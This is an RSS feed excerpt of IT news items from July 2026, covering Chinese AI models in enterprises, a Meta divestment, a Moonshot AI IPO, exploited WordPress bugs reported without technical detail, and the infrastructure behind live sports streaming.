<p class="wp-block-paragraph">The other solid reason to take a partnership approach is risk management. Apple had intended to develop its own buy-now, pay-later scheme via Apple Pay Later, but <a href="https://www.bbc.co.uk/news/articles/c255y82y9x8o" target="_blank" rel="noreferrer noopener">abandoned that plan</a> as it became riskier with rising bank rates. “Also, by backing the program with Klarna rather than reviving the in-house subscription plan it shelved in 2024, Apple captures the demand upside without taking the credit risk onto its own balance sheet,” Jeronimo said.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[(g+) Opinion: Meta's unwinding of Manus shows even forced deals have merits]]></title>
<description><![CDATA[Disposal of Chinese agentic AI start-up has left the Facebook owner better off than it might seem. Von Louise Lucas (KI, Wirtschaft)]]></description>
<link>https://tsecurity.de/de/3686964/it-nachrichten/g-opinion-metas-unwinding-of-manus-shows-even-forced-deals-have-merits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686964/it-nachrichten/g-opinion-metas-unwinding-of-manus-shows-even-forced-deals-have-merits/</guid>
<pubDate>Wed, 22 Jul 2026 18:11:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Disposal of Chinese agentic AI start-up has left the Facebook owner better off than it might seem. Von Louise Lucas (<a href="https://www.golem.de/specials/ki/">KI</a>, <a href="https://www.golem.de/specials/wirtschaft/">Wirtschaft</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=211154&amp;page=1&amp;ts=1784736002" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[US Army forced to reinstate limits on AI token usage after troops blew through allowances faster than expected]]></title>
<description><![CDATA[The US Army has reportedly pulled back its AI usage after burning through token allocations too quickly.]]></description>
<link>https://tsecurity.de/de/3686958/it-nachrichten/us-army-forced-to-reinstate-limits-on-ai-token-usage-after-troops-blew-through-allowances-faster-than-expected/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686958/it-nachrichten/us-army-forced-to-reinstate-limits-on-ai-token-usage-after-troops-blew-through-allowances-faster-than-expected/</guid>
<pubDate>Wed, 22 Jul 2026 18:11:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The US Army has reportedly pulled back its AI usage after burning through token allocations too quickly.]]></content:encoded>
</item>
<item>
<title><![CDATA[Moonshot AI Eyes IPO as Kimi K3 Drives ARR to $300M]]></title>
<description><![CDATA[Moonshot AI could list in Hong Kong within six months after ARR reached $300 million and Kimi K3 demand forced a pause in new subscriptions.
The post Moonshot AI Eyes IPO as Kimi K3 Drives ARR to $300M appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3686794/it-nachrichten/moonshot-ai-eyes-ipo-as-kimi-k3-drives-arr-to-300m/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686794/it-nachrichten/moonshot-ai-eyes-ipo-as-kimi-k3-drives-arr-to-300m/</guid>
<pubDate>Wed, 22 Jul 2026 17:10:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Moonshot AI could list in Hong Kong within six months after ARR reached $300 million and Kimi K3 demand forced a pause in new subscriptions.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-apac-china-moonshot-ai-ipo/">Moonshot AI Eyes IPO as Kimi K3 Drives ARR to $300M</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta’s unwinding of Manus shows even forced deals have merits]]></title>
<description><![CDATA[Disposal of Chinese agentic AI start-up has left the Facebook owner better off than it might seem]]></description>
<link>https://tsecurity.de/de/3684905/ai-nachrichten/metas-unwinding-of-manus-shows-even-forced-deals-have-merits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684905/ai-nachrichten/metas-unwinding-of-manus-shows-even-forced-deals-have-merits/</guid>
<pubDate>Tue, 21 Jul 2026 23:50:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Disposal of Chinese agentic AI start-up has left the Facebook owner better off than it might seem]]></content:encoded>
</item>
<item>
<title><![CDATA[The latest Chinese AI models may indeed work for enterprises, but only in a handful of specific applications]]></title>
<description><![CDATA[Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been nervous about relying on Chinese AI models. 



But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model Qwen3.8 Max and Moonshot’s 2.8-trillion-parameter model Kimi K3, ar...]]></description>
<link>https://tsecurity.de/de/3684721/ai-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684721/ai-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</guid>
<pubDate>Tue, 21 Jul 2026 21:24:16 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been <a href="https://www.cio.com/article/3816301/how-would-a-potential-ban-on-deepseek-impact-enterprises.html" target="_blank">nervous about relying on Chinese AI models</a>. </p>



<p class="wp-block-paragraph">But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noreferrer noopener">Qwen3.8 Max</a> and Moonshot’s 2.8-trillion-parameter model <a href="https://www.kimi.com/blog/kimi-k3" target="_blank" rel="noreferrer noopener">Kimi K3</a>, are promising even more powerful performance, those IT executives are being forced to again ask if these models are worth using, even in a limited fashion.</p>



<p class="wp-block-paragraph">Former Walmart head of risk <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, now an independent cybersecurity and risk advisor, thinks they should at least take another look. </p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but neither adopt nor reject them solely because they are Chinese,” he said. “They should be assessed like any other critical technology dependency: jurisdiction, ownership, training and software provenance, licensing, data handling, hosting, security, reliability, and the ability to independently test their behavior. Geopolitical exposure is a legitimate risk factor, but it should be incorporated into technical and supply-chain diligence rather than used as a substitute for it.”</p>



<h2 class="wp-block-heading">Choose applications with care</h2>



<p class="wp-block-paragraph">He added, “Chinese models may be especially valuable for coding, multilingual processing, high-volume document analysis, research, synthetic-data generation, and privately operated security or forensic workflows, but they should be subject to task-specific testing rather than broad benchmark claims.”</p>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, agreed that the Chinese models can work well if they are only used in carefully chosen applications. </p>



<p class="wp-block-paragraph">“Although Moonshot’s K3 still trails Claude’s Fable 5 and GPT 5.6 Sol on performance and user experience, good companies that have governance and prompt guardrails will not face the instability and improvisation of [the Chinese] models,” he said. “These models will win in usage. US frontier models are leading as the best models, but Chinese models will be sufficient for high-volume, low-drama tasks that cost less for non-critical transactions.”</p>



<p class="wp-block-paragraph">On the flipside, Bellamkonda suggested a variety of areas where enterprises should avoid Chinese AI models, including “customer-facing work without a human in the loop, regulated or sensitive data, and anything where a hallucinated answer creates legal or safety exposure. That is where the reliability gap and the political-radioactivity concern both bite, and where the closed American models still earn their premium.”</p>



<p class="wp-block-paragraph">Bellamkonda said he didn’t see the differences in data reliability, mostly involving hallucination rates, as meaningful for enterprise AI strategy decisions.</p>



<p class="wp-block-paragraph">“Every open-weight model in this class can get facts wrong or make things up. That is fixable with the right setup, so it is not a reason to avoid these models,” he said. “For high-volume tasks with clear limits, you feed the model your own trusted documents to answer from, and you keep a person checking the output. That combination is safe for production. The model on its own is not.”</p>



<h2 class="wp-block-heading">Too early for enterprises to consider</h2>



<p class="wp-block-paragraph">However, not everyone agrees that the latest Chinese models have earned their place as enterprise AI decision options. </p>



<p class="wp-block-paragraph">Cybersecurity consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, focused on Chinese technology concerns when he worked for the US Justice Department as its representative in the US law enforcement Joint Liaison Group (JLG) with China. </p>



<p class="wp-block-paragraph">“It is way too early for US enterprises to seriously consider these models,” he said. “Until proven otherwise, enterprises should assume that if they use these models, they may be granting China complete access to everything they do through the models, and potentially access to their networks and employees more broadly. At this point, any pros of using such models are strongly outweighed by the potential security, confidentiality, and reliability concerns.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai, was equally emphatic that enterprise CIOs need to steer clear of these newer Chinese models. </p>



<p class="wp-block-paragraph">“Using them inhouse? Absolutely not. You simply don’t know what is planted inside of it and you don’t know what training data is put into them,” Findling said. </p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, added that the very attractive pricing for these Chinese models may be appealing, but suggested that, despite the low cost, they’re ultimately too risky.</p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but not romantically. Parameter count is horsepower measured in a showroom, not braking distance in the rain,” he said. “The real tests are reliability on your data, the cost of a wrong answer, and whether the model behaves predictably under pressure.”</p>



<p class="wp-block-paragraph">He noted that the benchmarks on the latest open-weights models are impressive, and very close to those of the frontier lab models, which makes the cost ”incredibly seductive, especially when a team does not want to risk their data being used to train those frontier models.”</p>



<p class="wp-block-paragraph">But the Chinese models can still work in specific circumstances. “The strongest value will be in bounded, reversible and inspectable work: coding inside a sandbox, multilingual translation, document triage, data extraction and other high-volume tasks where outputs can be verified,” he said. “Cheap intelligence is valuable, but only when it is not mistaken for trustworthy judgment.”</p>



<p class="wp-block-paragraph">Wilkes added that the regulatory issues surrounding Chinese models can be especially problematic. Texas, for example, has <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">banned their usage</a>.  </p>



<h2 class="wp-block-heading">A rational choice for some workloads</h2>



<p class="wp-block-paragraph">However, <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, argued that CIOs should seriously consider these models. </p>



<p class="wp-block-paragraph">“Counterintuitively, the biggest benefit of Kimi and models like it is the lack of guardrails,” Goryunov said. “Think of it as stick shift cars in the era of automatics. If you want ease and comfort, stay with the frontiers because they have cruise control, shift the gears for you and they decide when. If you want performance and control, expand your horizons. But a stick shift assumes you know how to drive one: you bring your own governance, your own evals, your own safety layer. That’s a cost and specialized talent, which is super rare, and for the right organization it’s also the whole point.”</p>



<p class="wp-block-paragraph">Goryunov’s bottom line: “For internal, high-volume, well-harnessed workloads, [the Chinese models] have moved from ‘watch list’ to ‘rational choice.’”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199590/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The latest Chinese AI models may indeed work for enterprises, but only in a handful of specific applications]]></title>
<description><![CDATA[Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been nervous about relying on Chinese AI models. 



But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model Qwen3.8 Max and Moonshot’s 2.8-trillion-parameter model Kimi K3, ar...]]></description>
<link>https://tsecurity.de/de/3684669/it-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684669/it-nachrichten/the-latest-chinese-ai-models-may-indeed-work-for-enterprises-but-only-in-a-handful-of-specific-applications/</guid>
<pubDate>Tue, 21 Jul 2026 21:03:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Ever since Chinese AI startup DeepSeek launched three years ago, enterprise executives have been <a href="https://www.cio.com/article/3816301/how-would-a-potential-ban-on-deepseek-impact-enterprises.html" target="_blank">nervous about relying on Chinese AI models</a>. </p>



<p class="wp-block-paragraph">But now that the latest Chinese AI offerings, Alibaba’s 2.4-trillion-parameter model <a href="https://x.com/Alibaba_Qwen/status/2078759124914098291" target="_blank" rel="noreferrer noopener">Qwen3.8 Max</a> and Moonshot’s 2.8-trillion-parameter model <a href="https://www.kimi.com/blog/kimi-k3" target="_blank" rel="noreferrer noopener">Kimi K3</a>, are promising even more powerful performance, those IT executives are being forced to again ask if these models are worth using, even in a limited fashion.</p>



<p class="wp-block-paragraph">Former Walmart head of risk <a href="https://www.linkedin.com/in/steveneric/" target="_blank" rel="noreferrer noopener">Steven Eric Fisher</a>, now an independent cybersecurity and risk advisor, thinks they should at least take another look. </p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but neither adopt nor reject them solely because they are Chinese,” he said. “They should be assessed like any other critical technology dependency: jurisdiction, ownership, training and software provenance, licensing, data handling, hosting, security, reliability, and the ability to independently test their behavior. Geopolitical exposure is a legitimate risk factor, but it should be incorporated into technical and supply-chain diligence rather than used as a substitute for it.”</p>



<h2 class="wp-block-heading">Choose applications with care</h2>



<p class="wp-block-paragraph">He added, “Chinese models may be especially valuable for coding, multilingual processing, high-volume document analysis, research, synthetic-data generation, and privately operated security or forensic workflows, but they should be subject to task-specific testing rather than broad benchmark claims.”</p>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, agreed that the Chinese models can work well if they are only used in carefully chosen applications. </p>



<p class="wp-block-paragraph">“Although Moonshot’s K3 still trails Claude’s Fable 5 and GPT 5.6 Sol on performance and user experience, good companies that have governance and prompt guardrails will not face the instability and improvisation of [the Chinese] models,” he said. “These models will win in usage. US frontier models are leading as the best models, but Chinese models will be sufficient for high-volume, low-drama tasks that cost less for non-critical transactions.”</p>



<p class="wp-block-paragraph">On the flipside, Bellamkonda suggested a variety of areas where enterprises should avoid Chinese AI models, including “customer-facing work without a human in the loop, regulated or sensitive data, and anything where a hallucinated answer creates legal or safety exposure. That is where the reliability gap and the political-radioactivity concern both bite, and where the closed American models still earn their premium.”</p>



<p class="wp-block-paragraph">Bellamkonda said he didn’t see the differences in data reliability, mostly involving hallucination rates, as meaningful for enterprise AI strategy decisions.</p>



<p class="wp-block-paragraph">“Every open-weight model in this class can get facts wrong or make things up. That is fixable with the right setup, so it is not a reason to avoid these models,” he said. “For high-volume tasks with clear limits, you feed the model your own trusted documents to answer from, and you keep a person checking the output. That combination is safe for production. The model on its own is not.”</p>



<h2 class="wp-block-heading">Too early for enterprises to consider</h2>



<p class="wp-block-paragraph">However, not everyone agrees that the latest Chinese models have earned their place as enterprise AI decision options. </p>



<p class="wp-block-paragraph">Cybersecurity consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, focused on Chinese technology concerns when he worked for the US Justice Department as its representative in the US law enforcement Joint Liaison Group (JLG) with China. </p>



<p class="wp-block-paragraph">“It is way too early for US enterprises to seriously consider these models,” he said. “Until proven otherwise, enterprises should assume that if they use these models, they may be granting China complete access to everything they do through the models, and potentially access to their networks and employees more broadly. At this point, any pros of using such models are strongly outweighed by the potential security, confidentiality, and reliability concerns.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/tomfindling/" target="_blank" rel="noreferrer noopener">Tom Findling</a>, CEO of Conifers.ai, was equally emphatic that enterprise CIOs need to steer clear of these newer Chinese models. </p>



<p class="wp-block-paragraph">“Using them inhouse? Absolutely not. You simply don’t know what is planted inside of it and you don’t know what training data is put into them,” Findling said. </p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/eclectiqus/" target="_blank" rel="noreferrer noopener">Mike Wilkes</a>, enterprise CISO at Aikido Security, added that the very attractive pricing for these Chinese models may be appealing, but suggested that, despite the low cost, they’re ultimately too risky.</p>



<p class="wp-block-paragraph">“Enterprises should take these models seriously, but not romantically. Parameter count is horsepower measured in a showroom, not braking distance in the rain,” he said. “The real tests are reliability on your data, the cost of a wrong answer, and whether the model behaves predictably under pressure.”</p>



<p class="wp-block-paragraph">He noted that the benchmarks on the latest open-weights models are impressive, and very close to those of the frontier lab models, which makes the cost ”incredibly seductive, especially when a team does not want to risk their data being used to train those frontier models.”</p>



<p class="wp-block-paragraph">But the Chinese models can still work in specific circumstances. “The strongest value will be in bounded, reversible and inspectable work: coding inside a sandbox, multilingual translation, document triage, data extraction and other high-volume tasks where outputs can be verified,” he said. “Cheap intelligence is valuable, but only when it is not mistaken for trustworthy judgment.”</p>



<p class="wp-block-paragraph">Wilkes added that the regulatory issues surrounding Chinese models can be especially problematic. Texas, for example, has <a href="https://www.cio.com/article/4143748/top-global-and-us-ai-regulations-to-look-out-for.html" target="_blank">banned their usage</a>.  </p>



<h2 class="wp-block-heading">A rational choice for some workloads</h2>



<p class="wp-block-paragraph">However, <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, argued that CIOs should seriously consider these models. </p>



<p class="wp-block-paragraph">“Counterintuitively, the biggest benefit of Kimi and models like it is the lack of guardrails,” Goryunov said. “Think of it as stick shift cars in the era of automatics. If you want ease and comfort, stay with the frontiers because they have cruise control, shift the gears for you and they decide when. If you want performance and control, expand your horizons. But a stick shift assumes you know how to drive one: you bring your own governance, your own evals, your own safety layer. That’s a cost and specialized talent, which is super rare, and for the right organization it’s also the whole point.”</p>



<p class="wp-block-paragraph">Goryunov’s bottom line: “For internal, high-volume, well-harnessed workloads, [the Chinese models] have moved from ‘watch list’ to ‘rational choice.’”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Are Exploiting Recently Patched WordPress Bugs, Putting Millions of Websites at Risk]]></title>
<description><![CDATA[An anonymous reader quotes a report from TechCrunch: Hackers are breaking into websites that run vulnerable versions of the popular blogging software WordPress, according to several cybersecurity firms. One estimate puts the number of vulnerable WordPress websites at tens of millions as of Monday...]]></description>
<link>https://tsecurity.de/de/3682621/it-security-nachrichten/hackers-are-exploiting-recently-patched-wordpress-bugs-putting-millions-of-websites-at-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682621/it-security-nachrichten/hackers-are-exploiting-recently-patched-wordpress-bugs-putting-millions-of-websites-at-risk/</guid>
<pubDate>Tue, 21 Jul 2026 05:39:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from TechCrunch: Hackers are breaking into websites that run vulnerable versions of the popular blogging software WordPress, according to several cybersecurity firms. One estimate puts the number of vulnerable WordPress websites at tens of millions as of Monday. Last week, WordPress patched two critical security flaws, urging people who run its software on their websites to update it "immediately." The vulnerabilities are so severe that WordPress enabled forced updates where possible. Since then, cybersecurity companies Patchstack, Hexastrike, and WatchTowr have all warned that hackers are exploiting the vulnerabilities in the wild, meaning they are taking over websites that are still running susceptible versions of WordPress.
 
It's unclear how many WordPress-powered websites on the internet are at risk, but it's possible to make some educated guesses. The vulnerable versions of WordPress are 6.9.0 through 6.9.4, and 7.0.0 to 7.0.1. According to WordPress' official stats, there are more than 400 million websites that run those flawed versions, although these statistics likely don't reflect websites that have recently been patched. Cybersecurity consultant Daniel Card, who told TechCrunch that he looked at a sample of around 3,500 WordPress websites, estimates that less than 15% are vulnerable. Applying Card's projection across the total population of WordPress websites on the internet, the total figure would still be around 90 million. [...] One of the critical WordPress bugs was found and reported by Adam Kues of cybersecurity firm Searchlight Cyber, which dubbed it WP2Shell. Paired with the other bug, hackers can take full remote control of vulnerable websites.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Hackers+Are+Exploiting+Recently+Patched+WordPress+Bugs%2C+Putting+Millions+of+Websites+at+Risk%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F20%2F234246%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F20%2F234246%2Fhackers-are-exploiting-recently-patched-wordpress-bugs-putting-millions-of-websites-at-risk%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/20/234246/hackers-are-exploiting-recently-patched-wordpress-bugs-putting-millions-of-websites-at-risk?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The technology behind every live sports moment]]></title>
<description><![CDATA[When a goal goes in during a tournament quarter-final and a hundred million people watch it at the same time, what they feel is the goal. The roar, the replay, the disbelief.



They do not feel the contribution feeds traversing private media networks across continents, or the edge nodes absorbin...]]></description>
<link>https://tsecurity.de/de/3681409/it-nachrichten/the-technology-behind-every-live-sports-moment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681409/it-nachrichten/the-technology-behind-every-live-sports-moment/</guid>
<pubDate>Mon, 20 Jul 2026 16:48:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When a goal goes in during a tournament quarter-final and a hundred million people watch it at the same time, what they feel is the goal. The roar, the replay, the disbelief.</p>



<p class="wp-block-paragraph">They do not feel the contribution feeds traversing private media networks across continents, or the edge nodes absorbing a traffic spike that appeared without warning.</p>



<p class="wp-block-paragraph">They just feel the moment.</p>



<p class="wp-block-paragraph">And that’s exactly how it’s supposed to work.</p>



<p class="wp-block-paragraph">And as live sports viewership pushes into territory that makes previous records look modest (driven by a generation that expects to watch anything, on any device, anywhere, without waiting), the gap between getting that delivery right and getting it wrong has never been more consequential, or more public.</p>



<p class="wp-block-paragraph"><strong>As audiences moved to digital platforms, the margin for error disappeared.</strong><strong></strong></p>



<p class="wp-block-paragraph">There is a version of this conversation that is easy to have: audiences expect more, technology has to keep up. True, but incomplete.</p>



<p class="wp-block-paragraph">Audiences have always expected live sport to work. What changed is what “working” means, and how quickly they find out when it doesn’t.</p>



<p class="wp-block-paragraph">Viewers no longer sit in front of a single screen. During a FIFA World Cup match, a household might have the main feed on the living room television, while someone else streams the highlights on a second TV in the bedroom, all while phones flash with live stats and tablets run separate commentary. From the infrastructure’s perspective, that isn’t just one household watching a game; it’s a chaotic web of concurrent demands triggered by the exact same split-second on the pitch.</p>



<p class="wp-block-paragraph">Multiply that across tens of millions of viewers, and the scale of the challenge becomes clear. Social media raises the stakes further. When a platform fails during a World Cup knockout match, audiences report it in real-time on the same platforms they use to discuss the game. The complaint travels faster than the fix.</p>



<p class="wp-block-paragraph">Broadcasters no longer have the luxury of resolving an incident before people notice. The incident becomes the story, and in many cases, travels further than the match itself.</p>



<h3 class="wp-block-heading"><strong>What these viewership numbers actually mean for infrastructure</strong></h3>



<p class="wp-block-paragraph">The shift in how people watch live sport has moved well beyond trend territory.</p>



<p class="wp-block-paragraph">EMARKETER forecasts that digital live sports audiences in the US will grow to <a href="https://www.emarketer.com/content/100-million-watch-live-sports-digital">114.1 million viewers</a>, while traditional pay TV audiences decline to 82.0 million, highlighting the continued shift toward streaming.</p>



<p class="wp-block-paragraph">The concurrency numbers generated by major sporting events now sit in a territory that would have seemed implausible a decade ago.</p>



<p class="wp-block-paragraph">During the 2026 FIFA World Cup, for instance, streaming platforms shattered every historical ceiling, highlighted by Brazil’s <a href="https://streamscharts.com/news/fifa-world-cup-2026-group-stage-livestreaming">CazéTV</a> repeatedly breaking global YouTube records for concurrent viewership during the group stage. Meanwhile, in the United States, Peacock and <a href="https://www.nbcuniversal.com/article/fifa-world-cup-2026-propels-telemundo-and-peacock-record-viewership">Telemundo’s</a> digital platforms logged an unprecedented 13 million concurrent viewers for a single knockout window. </p>



<p class="wp-block-paragraph">When tens of millions of people tune into the same live stream at the same moment, it’s a challenge unlike regular web traffic.</p>



<p class="wp-block-paragraph">Historically, massive global audiences were insulated by geography. The load was spread across distinct regional networks: antenna signals, satellite downlinks, and physical cable architectures. The physical infrastructure of traditional television inherently absorbed the impact. </p>



<p class="wp-block-paragraph">Digital streaming removes that buffer. Traffic spikes all at once, often at the most critical moment. The tighter the match, the deeper the stoppage time, the sharper the spike. Network infrastructure is forced to handle its heaviest, most volatile traffic exactly when it has zero margin for error.</p>



<p class="wp-block-paragraph">Social media compounds the pressure operationally. The second a crucial goal is scored, a wave of real-time reactions floods the internet, instantly dragging a secondary “curiosity audience” into the app. These are people who weren’t even watching the match, but saw the hype and decided to tune in, meaning the network has to absorb a massive new rush of users precisely while the primary stream is already maxing out its capacity.</p>



<p class="wp-block-paragraph">To survive these surges while satisfying a modern audience, the underlying broadcast playbook has undergone a massive structural shift. It’s no longer just about handling traffic; it’s also about using modern technology like AI to manage it intelligently.</p>



<p class="wp-block-paragraph">According to an <a href="https://www.haivision.com/blog/all/2025-broadcast-transformation-report-key-takeaways/">industry survey</a>, 25% of broadcasters integrated AI into live production workflows in 2025, a massive leap from just 9% the previous year, with 64% identifying AI as the single largest impact driver over the next five years. </p>



<p class="wp-block-paragraph">The network is no longer just delivering content. AI is now generating highlights and short clips in real time, producing millions of videos that keep fans engaged long after the live moment has passed.</p>



<p class="wp-block-paragraph">Ultimately, the technical demand is driven by a shift in what viewers expect. An <a href="https://newsroom.ibm.com/2025-08-18-ibm-study-sports-fans-demand-more-dynamic-digital-content,-powered-by-ai">IBM sports study</a> revealed that 56% of fans now want AI-driven insights layered directly onto their content, while 33% point to real-time, automated translation as the feature that most impacts their experience.</p>



<p class="wp-block-paragraph">Whether it’s one screen or several, viewers don’t notice the edge infrastructure or AI powering the experience. They just expect the game to play without interruption.</p>



<h3 class="wp-block-heading"><strong>The planning mistake most organisations make</strong></h3>



<p class="wp-block-paragraph">Capacity planning is where most organisations spend their time when preparing to stream a major event. Can the system handle a million concurrent streams? Can it scale on demand if the numbers exceed projections? These are real questions. </p>



<p class="wp-block-paragraph">The lesson is not unique to sports streaming. Every digital business now experiences moments where demand, visibility, and customer expectations collide. Peak traffic events such as flash sales, ticket releases, and viral campaigns can drive website traffic <a href="https://aws.amazon.com/blogs/apn/how-to-manage-peak-traffic-on-aws-using-queue-its-virtual-waiting-room/">2 to 25 times above normal levels within seconds</a>. The infrastructure may be different, but the pressure is remarkably similar.<br></p>



<p class="wp-block-paragraph">Large-scale system failures occur when multiple components, each functioning as expected on its own, are overwhelmed by a surge in demand, rising latency, or regional blind spots at the same time.</p>



<p class="wp-block-paragraph">The problem isn’t the individual systems. It’s how they work together.</p>



<p class="wp-block-paragraph">Latency is the factor most consistently underestimated. A few seconds of delay is not a minor inconvenience in live sport. It is a fundamentally broken experience. </p>



<p class="wp-block-paragraph">A viewer whose stream is running four seconds behind will see a notification before the decisive moment appears on screen. Someone watching a service from the privacy of their room may hear a celebration from another room before seeing it on their screen.</p>



<p class="wp-block-paragraph">Geography is another planning gap. Streaming growth is increasingly being driven by emerging markets. In Southeast Asia alone, premium video streaming subscriptions grew <a href="https://avia.org/southeast-asia-premium-vod-accelerates-in-2025-as-subscriber-growth-rebounds-ctv-scales-and-local-content-breaks-through/?utm_source=chatgpt.com">19%</a> in 2025, led by Indonesia, while viewing hours continued to climb across the region. Yet much of the world’s media infrastructure was originally designed around North American and Western European demand. An architecture that looks robust on paper can deliver very different experiences depending on where the viewer is.</p>



<p class="wp-block-paragraph">The reason is simple: physical distance still matters. Every extra hop between the viewer and the content adds latency, making it harder to deliver a consistent experience at global scale.</p>



<p class="wp-block-paragraph">Then there is the timing question. The decisions that determine whether a platform holds during the most-watched minutes of the year are not made on event day. They are made months earlier through choices around architecture, redundancy, testing, and operational readiness.</p>



<p class="wp-block-paragraph">Once an event is underway, it’s too late to redesign the architecture behind it. If your system isn’t designed to handle the pressure before the crowd arrives, it’s already too late.</p>



